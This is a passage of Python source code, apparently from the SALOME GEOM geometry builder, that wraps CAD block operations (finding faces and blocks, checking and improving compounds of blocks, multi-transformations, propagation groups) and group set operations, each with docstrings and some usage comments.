# @param theFace Face of \a theBlock, opposite to the desired face.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the found face.
#
# @ref swig_GetOppositeFace "Example"
@ManageTransactions("BlocksOp")
def GetOppositeFace(self, theBlock, theFace, theName=None):
"""
Find a face, opposite to the given one in the given block.
Parameters:
theBlock Must be a hexahedral solid.
theFace Face of theBlock, opposite to the desired face.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the found face.
"""
# Example: see GEOM_Spanner.py
anObj = self.BlocksOp.GetOppositeFace(theBlock, theFace)
RaiseIfFailed("GetOppositeFace", self.BlocksOp)
self._autoPublish(anObj, theName, "face")
return anObj
## Find a face of the given shape, which has minimal distance to the given point.
# @param theShape Block or a compound of blocks.
# @param thePoint Point, close to the desired face.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the found face.
#
# @ref swig_GetFaceNearPoint "Example"
@ManageTransactions("BlocksOp")
def GetFaceNearPoint(self, theShape, thePoint, theName=None):
"""
Find a face of the given shape, which has minimal distance to the given point.
Parameters:
theShape Block or a compound of blocks.
thePoint Point, close to the desired face.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the found face.
"""
# Example: see GEOM_Spanner.py
anObj = self.BlocksOp.GetFaceNearPoint(theShape, thePoint)
RaiseIfFailed("GetFaceNearPoint", self.BlocksOp)
self._autoPublish(anObj, theName, "face")
return anObj
## Find a face of a block whose outward normal has the minimal angle with the given vector.
# @param theBlock Block or a compound of blocks.
# @param theVector Vector, close to the normal of the desired face.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the found face.
#
# @ref swig_todo "Example"
@ManageTransactions("BlocksOp")
def GetFaceByNormale(self, theBlock, theVector, theName=None):
"""
Find a face of a block whose outward normal has the minimal angle with the given vector.
Parameters:
theBlock Block or a compound of blocks.
theVector Vector, close to the normal of the desired face.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the found face.
"""
# Example: see GEOM_Spanner.py
anObj = self.BlocksOp.GetFaceByNormale(theBlock, theVector)
RaiseIfFailed("GetFaceByNormale", self.BlocksOp)
self._autoPublish(anObj, theName, "face")
return anObj
## Find all sub-shapes of type \a theShapeType of the given shape,
# which have minimal distance to the given point.
# @param theShape Any shape.
# @param thePoint Point, close to the desired shape.
        #  @param theShapeType Defines what kind of sub-shapes are searched (see GEOM::shape_type)
# @param theTolerance The tolerance for distances comparison. All shapes
# with distances to the given point in interval
# [minimal_distance, minimal_distance + theTolerance] will be gathered.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM_Object, containing a group of all found shapes.
#
# @ref swig_GetShapesNearPoint "Example"
@ManageTransactions("BlocksOp")
def GetShapesNearPoint(self, theShape, thePoint, theShapeType, theTolerance = 1e-07, theName=None):
"""
Find all sub-shapes of type theShapeType of the given shape,
which have minimal distance to the given point.
Parameters:
theShape Any shape.
thePoint Point, close to the desired shape.
                theShapeType Defines what kind of sub-shapes are searched (see GEOM::shape_type)
theTolerance The tolerance for distances comparison. All shapes
with distances to the given point in interval
[minimal_distance, minimal_distance + theTolerance] will be gathered.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM_Object, containing a group of all found shapes.
"""
# Example: see GEOM_TestOthers.py
anObj = self.BlocksOp.GetShapesNearPoint(theShape, thePoint, theShapeType, theTolerance)
RaiseIfFailed("GetShapesNearPoint", self.BlocksOp)
self._autoPublish(anObj, theName, "group")
return anObj
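        # A hedged usage sketch (illustrative object names): gather all edges of
        # 'Box' that are closest to the probe point, within the default tolerance:
        #   NearEdges = geompy.GetShapesNearPoint(Box, Probe, geompy.ShapeType["EDGE"])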
# end of l3_blocks_op
## @}
## @addtogroup l4_blocks_measure
## @{
        ## Check, if the given shape is a compound of blocks.
# To be considered as a compound of blocks, the
# given shape must satisfy the following conditions:
# - Each element of the compound should be a Block (6 faces and 12 edges).
# - A connection between two Blocks should be an entire quadrangle face or an entire edge.
        #  - The compound should be connected.
# - The glue between two quadrangle faces should be applied.
# @param theCompound The compound to check.
# @return TRUE, if the given shape is a compound of blocks.
# If theCompound is not valid, prints all discovered errors.
#
# @ref tui_measurement_tools_page "Example 1"
# \n @ref swig_CheckCompoundOfBlocks "Example 2"
@ManageTransactions("BlocksOp")
def CheckCompoundOfBlocks(self,theCompound):
"""
            Check, if the given shape is a compound of blocks.
To be considered as a compound of blocks, the
given shape must satisfy the following conditions:
- Each element of the compound should be a Block (6 faces and 12 edges).
- A connection between two Blocks should be an entire quadrangle face or an entire edge.
             - The compound should be connected.
- The glue between two quadrangle faces should be applied.
Parameters:
theCompound The compound to check.
Returns:
TRUE, if the given shape is a compound of blocks.
If theCompound is not valid, prints all discovered errors.
"""
# Example: see GEOM_Spanner.py
(IsValid, BCErrors) = self.BlocksOp.CheckCompoundOfBlocks(theCompound)
RaiseIfFailed("CheckCompoundOfBlocks", self.BlocksOp)
if IsValid == 0:
Descr = self.BlocksOp.PrintBCErrors(theCompound, BCErrors)
print Descr
return IsValid
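        # A hedged usage sketch (illustrative; 'Glued' stands for a compound of
        # solids whose coincident faces were merged, e.g. with MakeGlueFaces):
        #   if not geompy.CheckCompoundOfBlocks(Glued):
        #       print "Glued is not a valid compound of blocks"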
        ## Retrieve all non-block solids and faces from \a theShape.
# @param theShape The shape to explore.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return A tuple of two GEOM_Objects. The first object is a group of all
        #          non-block solids (= not 6 faces, or with 6 faces, but with the
# presence of non-quadrangular faces). The second object is a
        #          group of all non-quadrangular faces.
#
# @ref tui_measurement_tools_page "Example 1"
# \n @ref swig_GetNonBlocks "Example 2"
@ManageTransactions("BlocksOp")
def GetNonBlocks (self, theShape, theName=None):
"""
            Retrieve all non-block solids and faces from theShape.
Parameters:
theShape The shape to explore.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
A tuple of two GEOM_Objects. The first object is a group of all
                non-block solids (= not 6 faces, or with 6 faces, but with the
presence of non-quadrangular faces). The second object is a
                group of all non-quadrangular faces.
Usage:
(res_sols, res_faces) = geompy.GetNonBlocks(myShape1)
"""
# Example: see GEOM_Spanner.py
aTuple = self.BlocksOp.GetNonBlocks(theShape)
RaiseIfFailed("GetNonBlocks", self.BlocksOp)
self._autoPublish(aTuple, theName, ("groupNonHexas", "groupNonQuads"))
return aTuple
## Remove all seam and degenerated edges from \a theShape.
# Unite faces and edges, sharing one surface. It means that
        #  these faces must have references to one C++ surface object (handle).
# @param theShape The compound or single solid to remove irregular edges from.
# @param doUnionFaces If True, then unite faces. If False (the default value),
# do not unite faces.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return Improved shape.
#
# @ref swig_RemoveExtraEdges "Example"
@ManageTransactions("BlocksOp")
def RemoveExtraEdges(self, theShape, doUnionFaces=False, theName=None):
"""
Remove all seam and degenerated edges from theShape.
Unite faces and edges, sharing one surface. It means that
            these faces must have references to one C++ surface object (handle).
Parameters:
theShape The compound or single solid to remove irregular edges from.
doUnionFaces If True, then unite faces. If False (the default value),
do not unite faces.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
Improved shape.
"""
# Example: see GEOM_TestOthers.py
nbFacesOptimum = -1 # -1 means do not unite faces
if doUnionFaces is True: nbFacesOptimum = 0 # 0 means unite faces
anObj = self.BlocksOp.RemoveExtraEdges(theShape, nbFacesOptimum)
RaiseIfFailed("RemoveExtraEdges", self.BlocksOp)
self._autoPublish(anObj, theName, "removeExtraEdges")
return anObj
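        # A hedged usage sketch (illustrative; 'Fused' stands for any solid
        # carrying seam or degenerated edges, e.g. the result of a fuse):
        #   Clean = geompy.RemoveExtraEdges(Fused, doUnionFaces=True)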
        ## Performs union of faces of \a theShape.
# Unite faces sharing one surface. It means that
# these faces must have references to one C++ surface object (handle).
# @param theShape The compound or single solid that contains faces
# to perform union.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return Improved shape.
#
# @ref swig_UnionFaces "Example"
@ManageTransactions("BlocksOp")
def UnionFaces(self, theShape, theName=None):
"""
            Performs union of faces of theShape.
Unite faces sharing one surface. It means that
these faces must have references to one C++ surface object (handle).
Parameters:
theShape The compound or single solid that contains faces
to perform union.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
Improved shape.
"""
# Example: see GEOM_TestOthers.py
anObj = self.BlocksOp.UnionFaces(theShape)
RaiseIfFailed("UnionFaces", self.BlocksOp)
self._autoPublish(anObj, theName, "unionFaces")
return anObj
## Check, if the given shape is a blocks compound.
# Fix all detected errors.
        #  \note Single block can also be fixed by this method.
# @param theShape The compound to check and improve.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return Improved compound.
#
# @ref swig_CheckAndImprove "Example"
@ManageTransactions("BlocksOp")
def CheckAndImprove(self, theShape, theName=None):
"""
Check, if the given shape is a blocks compound.
Fix all detected errors.
Note:
                Single block can also be fixed by this method.
Parameters:
theShape The compound to check and improve.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
Improved compound.
"""
# Example: see GEOM_TestOthers.py
anObj = self.BlocksOp.CheckAndImprove(theShape)
RaiseIfFailed("CheckAndImprove", self.BlocksOp)
self._autoPublish(anObj, theName, "improved")
return anObj
# end of l4_blocks_measure
## @}
## @addtogroup l3_blocks_op
## @{
## Get all the blocks, contained in the given compound.
# @param theCompound The compound to explode.
# @param theMinNbFaces If solid has lower number of faces, it is not a block.
# @param theMaxNbFaces If solid has higher number of faces, it is not a block.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @note If theMaxNbFaces = 0, the maximum number of faces is not restricted.
#
# @return List of GEOM.GEOM_Object, containing the retrieved blocks.
#
# @ref tui_explode_on_blocks "Example 1"
# \n @ref swig_MakeBlockExplode "Example 2"
@ManageTransactions("BlocksOp")
def MakeBlockExplode(self, theCompound, theMinNbFaces, theMaxNbFaces, theName=None):
"""
Get all the blocks, contained in the given compound.
Parameters:
theCompound The compound to explode.
theMinNbFaces If solid has lower number of faces, it is not a block.
theMaxNbFaces If solid has higher number of faces, it is not a block.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Note:
If theMaxNbFaces = 0, the maximum number of faces is not restricted.
Returns:
List of GEOM.GEOM_Object, containing the retrieved blocks.
"""
# Example: see GEOM_TestOthers.py
theMinNbFaces,theMaxNbFaces,Parameters = ParseParameters(theMinNbFaces,theMaxNbFaces)
aList = self.BlocksOp.ExplodeCompoundOfBlocks(theCompound, theMinNbFaces, theMaxNbFaces)
RaiseIfFailed("ExplodeCompoundOfBlocks", self.BlocksOp)
for anObj in aList:
anObj.SetParameters(Parameters)
pass
self._autoPublish(aList, theName, "block")
return aList
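        # A hedged usage sketch (illustrative): keep only hexahedral blocks,
        # i.e. solids with exactly 6 faces:
        #   Blocks = geompy.MakeBlockExplode(Compound, 6, 6)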
## Find block, containing the given point inside its volume or on boundary.
# @param theCompound Compound, to find block in.
        #  @param thePoint Point, close to the desired block. If the point lies on
        #         the boundary between some blocks, the block with the nearest center is returned.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the found block.
#
# @ref swig_todo "Example"
@ManageTransactions("BlocksOp")
def GetBlockNearPoint(self, theCompound, thePoint, theName=None):
"""
Find block, containing the given point inside its volume or on boundary.
Parameters:
theCompound Compound, to find block in.
                thePoint Point, close to the desired block. If the point lies on
                         the boundary between some blocks, the block with the nearest center is returned.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the found block.
"""
# Example: see GEOM_Spanner.py
anObj = self.BlocksOp.GetBlockNearPoint(theCompound, thePoint)
RaiseIfFailed("GetBlockNearPoint", self.BlocksOp)
self._autoPublish(anObj, theName, "block")
return anObj
## Find block, containing all the elements, passed as the parts, or maximum quantity of them.
# @param theCompound Compound, to find block in.
# @param theParts List of faces and/or edges and/or vertices to be parts of the found block.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the found block.
#
# @ref swig_GetBlockByParts "Example"
@ManageTransactions("BlocksOp")
def GetBlockByParts(self, theCompound, theParts, theName=None):
"""
Find block, containing all the elements, passed as the parts, or maximum quantity of them.
Parameters:
theCompound Compound, to find block in.
theParts List of faces and/or edges and/or vertices to be parts of the found block.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM_Object, containing the found block.
"""
# Example: see GEOM_TestOthers.py
anObj = self.BlocksOp.GetBlockByParts(theCompound, theParts)
RaiseIfFailed("GetBlockByParts", self.BlocksOp)
self._autoPublish(anObj, theName, "block")
return anObj
## Return all blocks, containing all the elements, passed as the parts.
# @param theCompound Compound, to find blocks in.
# @param theParts List of faces and/or edges and/or vertices to be parts of the found blocks.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return List of GEOM.GEOM_Object, containing the found blocks.
#
# @ref swig_todo "Example"
@ManageTransactions("BlocksOp")
def GetBlocksByParts(self, theCompound, theParts, theName=None):
"""
Return all blocks, containing all the elements, passed as the parts.
Parameters:
theCompound Compound, to find blocks in.
theParts List of faces and/or edges and/or vertices to be parts of the found blocks.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
List of GEOM.GEOM_Object, containing the found blocks.
"""
# Example: see GEOM_Spanner.py
aList = self.BlocksOp.GetBlocksByParts(theCompound, theParts)
RaiseIfFailed("GetBlocksByParts", self.BlocksOp)
self._autoPublish(aList, theName, "block")
return aList
## Multi-transformate block and glue the result.
        #  Transformation is defined so as to superpose the direction faces.
# @param Block Hexahedral solid to be multi-transformed.
# @param DirFace1 ID of First direction face.
# @param DirFace2 ID of Second direction face.
# @param NbTimes Quantity of transformations to be done.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @note Unique ID of sub-shape can be obtained, using method GetSubShapeID().
#
# @return New GEOM.GEOM_Object, containing the result shape.
#
# @ref tui_multi_transformation "Example"
@ManageTransactions("BlocksOp")
def MakeMultiTransformation1D(self, Block, DirFace1, DirFace2, NbTimes, theName=None):
"""
Multi-transformate block and glue the result.
            Transformation is defined so as to superpose the direction faces.
Parameters:
Block Hexahedral solid to be multi-transformed.
DirFace1 ID of First direction face.
DirFace2 ID of Second direction face.
NbTimes Quantity of transformations to be done.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Note:
Unique ID of sub-shape can be obtained, using method GetSubShapeID().
Returns:
New GEOM.GEOM_Object, containing the result shape.
"""
# Example: see GEOM_Spanner.py
DirFace1,DirFace2,NbTimes,Parameters = ParseParameters(DirFace1,DirFace2,NbTimes)
anObj = self.BlocksOp.MakeMultiTransformation1D(Block, DirFace1, DirFace2, NbTimes)
RaiseIfFailed("MakeMultiTransformation1D", self.BlocksOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "transformed")
return anObj
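        # A hedged usage sketch (illustrative; the direction face IDs would
        # normally come from GetSubShapeID on two opposite faces of 'Block'):
        #   id1 = geompy.GetSubShapeID(Block, Face1)
        #   id2 = geompy.GetSubShapeID(Block, Face2)
        #   Row = geompy.MakeMultiTransformation1D(Block, id1, id2, 5)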
## Multi-transformate block and glue the result.
# @param Block Hexahedral solid to be multi-transformed.
# @param DirFace1U,DirFace2U IDs of Direction faces for the first transformation.
# @param DirFace1V,DirFace2V IDs of Direction faces for the second transformation.
# @param NbTimesU,NbTimesV Quantity of transformations to be done.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the result shape.
#
# @ref tui_multi_transformation "Example"
@ManageTransactions("BlocksOp")
def MakeMultiTransformation2D(self, Block, DirFace1U, DirFace2U, NbTimesU,
DirFace1V, DirFace2V, NbTimesV, theName=None):
"""
Multi-transformate block and glue the result.
Parameters:
Block Hexahedral solid to be multi-transformed.
DirFace1U,DirFace2U IDs of Direction faces for the first transformation.
DirFace1V,DirFace2V IDs of Direction faces for the second transformation.
NbTimesU,NbTimesV Quantity of transformations to be done.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the result shape.
"""
# Example: see GEOM_Spanner.py
DirFace1U,DirFace2U,NbTimesU,DirFace1V,DirFace2V,NbTimesV,Parameters = ParseParameters(
DirFace1U,DirFace2U,NbTimesU,DirFace1V,DirFace2V,NbTimesV)
anObj = self.BlocksOp.MakeMultiTransformation2D(Block, DirFace1U, DirFace2U, NbTimesU,
DirFace1V, DirFace2V, NbTimesV)
RaiseIfFailed("MakeMultiTransformation2D", self.BlocksOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "transformed")
return anObj
## Build all possible propagation groups.
# Propagation group is a set of all edges, opposite to one (main)
# edge of this group directly or through other opposite edges.
        #  The notion of opposite edge makes sense only on a quadrangle face.
# @param theShape Shape to build propagation groups on.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return List of GEOM.GEOM_Object, each of them is a propagation group.
#
# @ref swig_Propagate "Example"
@ManageTransactions("BlocksOp")
def Propagate(self, theShape, theName=None):
"""
Build all possible propagation groups.
Propagation group is a set of all edges, opposite to one (main)
edge of this group directly or through other opposite edges.
            The notion of opposite edge makes sense only on a quadrangle face.
Parameters:
theShape Shape to build propagation groups on.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
List of GEOM.GEOM_Object, each of them is a propagation group.
"""
# Example: see GEOM_TestOthers.py
listChains = self.BlocksOp.Propagate(theShape)
RaiseIfFailed("Propagate", self.BlocksOp)
self._autoPublish(listChains, theName, "propagate")
return listChains
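        # A hedged usage sketch (illustrative): publish every propagation group
        # found on a shape under that shape in the study:
        #   for chain in geompy.Propagate(Shape):
        #       geompy.addToStudyInFather(Shape, chain, chain.GetName())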
# end of l3_blocks_op
## @}
## @addtogroup l3_groups
## @{
## Creates a new group which will store sub-shapes of theMainShape
# @param theMainShape is a GEOM object on which the group is selected
# @param theShapeType defines a shape type of the group (see GEOM::shape_type)
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return a newly created GEOM group (GEOM.GEOM_Object)
#
# @ref tui_working_with_groups_page "Example 1"
# \n @ref swig_CreateGroup "Example 2"
@ManageTransactions("GroupOp")
def CreateGroup(self, theMainShape, theShapeType, theName=None):
"""
Creates a new group which will store sub-shapes of theMainShape
Parameters:
theMainShape is a GEOM object on which the group is selected
                theShapeType defines a shape type of the group: "COMPOUND", "COMPSOLID",
"SOLID", "SHELL", "FACE", "WIRE", "EDGE", "VERTEX", "SHAPE".
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
a newly created GEOM group
Example of usage:
group = geompy.CreateGroup(Box, geompy.ShapeType["FACE"])
"""
# Example: see GEOM_TestOthers.py
anObj = self.GroupOp.CreateGroup(theMainShape, theShapeType)
RaiseIfFailed("CreateGroup", self.GroupOp)
self._autoPublish(anObj, theName, "group")
return anObj
        ## Adds a sub-object with ID theSubShapeID to the group
# @param theGroup is a GEOM group to which the new sub-shape is added
# @param theSubShapeID is a sub-shape ID in the main object.
        #  \note Use method GetSubShapeID() to get a unique ID of the sub-shape
#
# @ref tui_working_with_groups_page "Example"
@ManageTransactions("GroupOp")
def AddObject(self,theGroup, theSubShapeID):
"""
            Adds a sub-object with ID theSubShapeID to the group
Parameters:
theGroup is a GEOM group to which the new sub-shape is added
theSubShapeID is a sub-shape ID in the main object.
Note:
                Use method GetSubShapeID() to get a unique ID of the sub-shape
"""
# Example: see GEOM_TestOthers.py
self.GroupOp.AddObject(theGroup, theSubShapeID)
if self.GroupOp.GetErrorCode() != "PAL_ELEMENT_ALREADY_PRESENT":
RaiseIfFailed("AddObject", self.GroupOp)
pass
pass
        ## Removes a sub-object with ID \a theSubShapeID from the group
# @param theGroup is a GEOM group from which the new sub-shape is removed
# @param theSubShapeID is a sub-shape ID in the main object.
        #  \note Use method GetSubShapeID() to get a unique ID of the sub-shape
#
# @ref tui_working_with_groups_page "Example"
@ManageTransactions("GroupOp")
def RemoveObject(self,theGroup, theSubShapeID):
"""
            Removes a sub-object with ID theSubShapeID from the group
Parameters:
theGroup is a GEOM group from which the new sub-shape is removed
theSubShapeID is a sub-shape ID in the main object.
Note:
                Use method GetSubShapeID() to get a unique ID of the sub-shape
"""
# Example: see GEOM_TestOthers.py
self.GroupOp.RemoveObject(theGroup, theSubShapeID)
RaiseIfFailed("RemoveObject", self.GroupOp)
pass
        ## Adds to the group all the given shapes. No errors, if some shapes are already included.
# @param theGroup is a GEOM group to which the new sub-shapes are added.
# @param theSubShapes is a list of sub-shapes to be added.
#
# @ref tui_working_with_groups_page "Example"
@ManageTransactions("GroupOp")
def UnionList (self,theGroup, theSubShapes):
"""
            Adds to the group all the given shapes. No errors, if some shapes are already included.
Parameters:
theGroup is a GEOM group to which the new sub-shapes are added.
theSubShapes is a list of sub-shapes to be added.
"""
# Example: see GEOM_TestOthers.py
self.GroupOp.UnionList(theGroup, theSubShapes)
RaiseIfFailed("UnionList", self.GroupOp)
pass
        ## Adds to the group all the given shapes. No errors, if some shapes are already included.
# @param theGroup is a GEOM group to which the new sub-shapes are added.
# @param theSubShapes is a list of indices of sub-shapes to be added.
#
# @ref swig_UnionIDs "Example"
@ManageTransactions("GroupOp")
def UnionIDs(self,theGroup, theSubShapes):
"""
            Adds to the group all the given shapes. No errors, if some shapes are already included.
Parameters:
theGroup is a GEOM group to which the new sub-shapes are added.
theSubShapes is a list of indices of sub-shapes to be added.
"""
# Example: see GEOM_TestOthers.py
self.GroupOp.UnionIDs(theGroup, theSubShapes)
RaiseIfFailed("UnionIDs", self.GroupOp)
pass
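        # A hedged usage sketch (the IDs are illustrative; real ones come from
        # GetSubShapeID or GetObjectIDs):
        #   geompy.UnionIDs(aGroup, [3, 7, 13])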
## Removes from the group all the given shapes. No errors, if some shapes are not included.
# @param theGroup is a GEOM group from which the sub-shapes are removed.
# @param theSubShapes is a list of sub-shapes to be removed.
#
# @ref tui_working_with_groups_page "Example"
@ManageTransactions("GroupOp")
def DifferenceList (self,theGroup, theSubShapes):
"""
Removes from the group all the given shapes. No errors, if some shapes are not included.
Parameters:
theGroup is a GEOM group from which the sub-shapes are removed.
theSubShapes is a list of sub-shapes to be removed.
"""
# Example: see GEOM_TestOthers.py
self.GroupOp.DifferenceList(theGroup, theSubShapes)
RaiseIfFailed("DifferenceList", self.GroupOp)
pass
## Removes from the group all the given shapes. No errors, if some shapes are not included.
# @param theGroup is a GEOM group from which the sub-shapes are removed.
# @param theSubShapes is a list of indices of sub-shapes to be removed.
#
# @ref swig_DifferenceIDs "Example"
@ManageTransactions("GroupOp")
def DifferenceIDs(self,theGroup, theSubShapes):
"""
Removes from the group all the given shapes. No errors, if some shapes are not included.
Parameters:
theGroup is a GEOM group from which the sub-shapes are removed.
theSubShapes is a list of indices of sub-shapes to be removed.
"""
# Example: see GEOM_TestOthers.py
self.GroupOp.DifferenceIDs(theGroup, theSubShapes)
RaiseIfFailed("DifferenceIDs", self.GroupOp)
pass
## Union of two groups.
# New group is created. It will contain all entities
# which are present in groups theGroup1 and theGroup2.
# @param theGroup1, theGroup2 are the initial GEOM groups
# to create the united group from.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return a newly created GEOM group.
#
# @ref tui_union_groups_anchor "Example"
@ManageTransactions("GroupOp")
def UnionGroups (self, theGroup1, theGroup2, theName=None):
"""
Union of two groups.
New group is created. It will contain all entities
which are present in groups theGroup1 and theGroup2.
Parameters:
theGroup1, theGroup2 are the initial GEOM groups
to create the united group from.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
a newly created GEOM group.
"""
# Example: see GEOM_TestOthers.py
aGroup = self.GroupOp.UnionGroups(theGroup1, theGroup2)
RaiseIfFailed("UnionGroups", self.GroupOp)
self._autoPublish(aGroup, theName, "group")
return aGroup
## Intersection of two groups.
# New group is created. It will contain only those entities
# which are present in both groups theGroup1 and theGroup2.
# @param theGroup1, theGroup2 are the initial GEOM groups to get common part of.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return a newly created GEOM group.
#
# @ref tui_intersect_groups_anchor "Example"
@ManageTransactions("GroupOp")
def IntersectGroups (self, theGroup1, theGroup2, theName=None):
"""
Intersection of two groups.
New group is created. It will contain only those entities
which are present in both groups theGroup1 and theGroup2.
Parameters:
theGroup1, theGroup2 are the initial GEOM groups to get common part of.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
a newly created GEOM group.
"""
# Example: see GEOM_TestOthers.py
aGroup = self.GroupOp.IntersectGroups(theGroup1, theGroup2)
RaiseIfFailed("IntersectGroups", self.GroupOp)
self._autoPublish(aGroup, theName, "group")
return aGroup
## Cut of two groups.
# New group is created. It will contain entities which are
# present in group theGroup1 but are not present in group theGroup2.
# @param theGroup1 is a GEOM group to include elements of.
# @param theGroup2 is a GEOM group to exclude elements of.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return a newly created GEOM group.
#
# @ref tui_cut_groups_anchor "Example"
@ManageTransactions("GroupOp")
def CutGroups (self, theGroup1, theGroup2, theName=None):
"""
Cut of two groups.
New group is created. It will contain entities which are
present in group theGroup1 but are not present in group theGroup2.
Parameters:
theGroup1 is a GEOM group to include elements of.
theGroup2 is a GEOM group to exclude elements of.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
a newly created GEOM group.
"""
# Example: see GEOM_TestOthers.py
aGroup = self.GroupOp.CutGroups(theGroup1, theGroup2)
RaiseIfFailed("CutGroups", self.GroupOp)
self._autoPublish(aGroup, theName, "group")
return aGroup
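        # A hedged sketch combining the three pairwise group booleans
        # (illustrative group names):
        #   Both   = geompy.IntersectGroups(GroupA, GroupB)
        #   Either = geompy.UnionGroups(GroupA, GroupB)
        #   OnlyA  = geompy.CutGroups(GroupA, GroupB)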
## Union of list of groups.
# New group is created. It will contain all entities that are
# present in groups listed in theGList.
# @param theGList is a list of GEOM groups to create the united group from.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return a newly created GEOM group.
#
# @ref tui_union_groups_anchor "Example"
@ManageTransactions("GroupOp")
def UnionListOfGroups (self, theGList, theName=None):
"""
Union of list of groups.
New group is created. It will contain all entities that are
present in groups listed in theGList.
Parameters:
theGList is a list of GEOM groups to create the united group from.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
a newly created GEOM group.
"""
# Example: see GEOM_TestOthers.py
aGroup = self.GroupOp.UnionListOfGroups(theGList)
RaiseIfFailed("UnionListOfGroups", self.GroupOp)
self._autoPublish(aGroup, theName, "group")
return aGroup
        ## Intersection of a list of groups.
        #  New group is created. It will contain only entities
        #  which are present in all groups listed in theGList.
# @param theGList is a list of GEOM groups to include elements of.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return a newly created GEOM group.
#
# @ref tui_intersect_groups_anchor "Example"
@ManageTransactions("GroupOp")
def IntersectListOfGroups (self, theGList, theName=None):
"""
            Intersection of a list of groups.
            New group is created. It will contain only entities
            which are present in all groups listed in theGList.
Parameters:
theGList is a list of GEOM groups to include elements of.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
a newly created GEOM group.
"""
# Example: see GEOM_TestOthers.py
aGroup = self.GroupOp.IntersectListOfGroups(theGList)
RaiseIfFailed("IntersectListOfGroups", self.GroupOp)
self._autoPublish(aGroup, theName, "group")
return aGroup
## Cut of lists of groups.
